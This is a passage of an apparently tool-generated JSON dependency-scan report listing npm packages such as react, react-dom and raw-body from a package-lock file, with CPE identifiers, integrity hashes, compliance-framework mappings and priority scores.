"cpe:2.3:a:range:range-parser:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:range:range_parser:1.2.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/range-parser@1.2.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz", "integrity": "sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7d9cd0e4ae47337e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: raw-body 2.5.3", "title": "raw-body 2.5.3", "description": "Package discovered: raw-body 2.5.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "62bf6c85ca605f5a", "name": "raw-body", "version": "2.5.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:raw-body:raw-body:2.5.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:raw-body:raw_body:2.5.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:raw_body:raw-body:2.5.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:raw_body:raw_body:2.5.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:raw:raw-body:2.5.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:raw:raw_body:2.5.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/raw-body@2.5.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/raw-body/-/raw-body-2.5.3.tgz", "integrity": "sha512-s4VSOf6yN0rvbRZGxs8Om5CWj6seneMwK3oDb4lWDH0UPhWcxwOWw5+qk24bxq87szX1ydrwylIOp2uG1ojUpA==", "dependencies": { "bytes": "~3.1.2", "http-errors": "~2.0.1", "iconv-lite": "~0.4.24", "unpipe": "~1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aa3b52d55574a475", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: react 18.3.1", "title": "react 18.3.1", "description": "Package discovered: react 18.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "405f6eb700866b5f", "name": "react", "version": "18.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:react:react:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/react@18.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/react/-/react-18.3.1.tgz", "integrity": "sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ==", "dependencies": { "loose-envify": "^1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "36e9f0b5d3cd995c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: react-dom 18.3.1", "title": "react-dom 18.3.1", "description": "Package discovered: react-dom 18.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "98bcef2cdcc9941a", "name": "react-dom", "version": "18.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:react-dom:react-dom:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-dom:react_dom:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_dom:react-dom:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_dom:react_dom:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react-dom:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react_dom:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/react-dom@18.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-18.3.1.tgz", "integrity": "sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw==", "dependencies": { "loose-envify": "^1.1.0", "scheduler": "^0.23.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "19cfc2419956329b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: react-is 16.13.1", "title": "react-is 16.13.1", "description": "Package discovered: react-is 16.13.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0db53ea4a0e10790", "name": "react-is", "version": "16.13.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:react-is:react-is:16.13.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-is:react_is:16.13.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_is:react-is:16.13.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_is:react_is:16.13.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react-is:16.13.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react_is:16.13.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/react-is@16.13.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "320c91417fe22e47", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: react-is 18.3.1", "title": "react-is 18.3.1", "description": "Package discovered: react-is 18.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "756017d5bfb89c54", "name": "react-is", "version": "18.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:react-is:react-is:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-is:react_is:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_is:react-is:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_is:react_is:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react-is:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react_is:18.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/react-is@18.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e00babcb3a543f4c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: react-promise-suspense 0.3.4", "title": "react-promise-suspense 0.3.4", "description": "Package discovered: react-promise-suspense 0.3.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "74a57b2250b339b3", "name": "react-promise-suspense", "version": "0.3.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:react-promise-suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-promise-suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_promise_suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_promise_suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/react-promise-suspense@0.3.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/react-promise-suspense/-/react-promise-suspense-0.3.4.tgz", "integrity": "sha512-I42jl7L3Ze6kZaq+7zXWSunBa3b1on5yfvUW6Eo/3fFOj6dZ5Bqmcd264nJbTK/gn1HjjILAjSwnZbV4RpSaNQ==", "dependencies": { "fast-deep-equal": "^2.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "45e27e6a5bb4b37b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: react-smooth 4.0.4", "title": "react-smooth 4.0.4", "description": "Package discovered: react-smooth 4.0.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "646f82a1b8ded3b2", "name": "react-smooth", "version": "4.0.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:react-smooth:react-smooth:4.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-smooth:react_smooth:4.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_smooth:react-smooth:4.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_smooth:react_smooth:4.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react-smooth:4.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react_smooth:4.0.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/react-smooth@4.0.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/react-smooth/-/react-smooth-4.0.4.tgz", "integrity": "sha512-gnGKTpYwqL0Iii09gHobNolvX4Kiq4PKx6eWBCYYix+8cdw+cGo3do906l1NBPKkSWx1DghC1dlWG9L2uGd61Q==", "dependencies": { "fast-equals": "^5.0.1", "prop-types": "^15.8.1", "react-transition-group": "^4.4.5" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8e8ac167acac7b76", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: react-transition-group 4.4.5", "title": "react-transition-group 4.4.5", "description": "Package discovered: react-transition-group 4.4.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "15c7effc6183b848", "name": "react-transition-group", "version": "4.4.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:react-transition-group:react-transition-group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-transition-group:react_transition_group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_transition_group:react-transition-group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_transition_group:react_transition_group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-transition:react-transition-group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react-transition:react_transition_group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_transition:react-transition-group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react_transition:react_transition_group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react-transition-group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:react:react_transition_group:4.4.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/react-transition-group@4.4.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz", "integrity": "sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g==", "dependencies": { "@babel/runtime": "^7.5.5", "dom-helpers": "^5.0.1", "loose-envify": "^1.4.0", "prop-types": "^15.6.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise 